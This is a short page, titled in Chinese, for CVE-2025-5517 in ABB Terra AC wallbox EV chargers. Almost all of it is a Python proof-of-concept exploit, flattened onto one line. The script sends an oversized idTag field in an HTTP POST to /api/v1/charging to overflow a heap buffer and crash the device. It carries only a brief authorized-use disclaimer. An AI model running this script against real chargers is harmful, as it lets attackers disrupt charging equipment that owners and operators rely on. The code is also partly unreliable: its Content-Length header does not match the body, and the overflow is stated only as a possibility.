CVE-2025-5517 ABB Terra AC壁挂式充电桩堆缓冲区溢出漏洞

# CVE-2025-5517 - ABB Terra AC Wallbox Heap-based Buffer Overflow PoC # WARNING: This PoC is for educational and authorized testing purposes only. # Unauthorized use against systems you do not own is illegal. import socket import struct import sys TARGET_HOST = "192.168.1.100" # Replace with target ABB Terra AC wallbox IP TARGET_PORT = 80 # Common management/web port BUFFER_SIZE = 8192 # Oversized payload to trigger heap overflow def build_malicious_payload(): """ Build a malformed HTTP/OCPP request with an oversized field to trigger heap-based buffer overflow in the wallbox firmware. """ # Normal HTTP POST header header = b"POST /api/v1/charging HTTP/1.1\r\n" header += b"Host: " + TARGET_HOST.encode() + b"\r\n" header += b"Content-Type: application/json\r\n" header += b"Content-Length: " + str(BUFFER_SIZE).encode() + b"\r\n" header += b"Connection: keep-alive\r\n" header += b"\r\n" # Malicious oversized JSON body with a long string field # This may overflow the heap buffer allocated for parsing the parameter payload = b'{"idTag":"' + b'A' * BUFFER_SIZE + b'","connectorId":1}' return header + payload def exploit(): print(f"[*] Targeting ABB Terra AC Wallbox at {TARGET_HOST}:{TARGET_PORT}") try: sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM) sock.settimeout(10) sock.connect((TARGET_HOST, TARGET_PORT)) print("[+] Connection established") payload = build_malicious_payload() sock.send(payload) print(f"[+] Sent {len(payload)} bytes of malicious payload") try: response = sock.recv(4096) print(f"[*] Response: {response[:200]}") except socket.timeout: print("[!] No response - device may have crashed (DoS confirmed)") sock.close() except Exception as e: print(f"[-] Error: {e}") if __name__ == "__main__": exploit()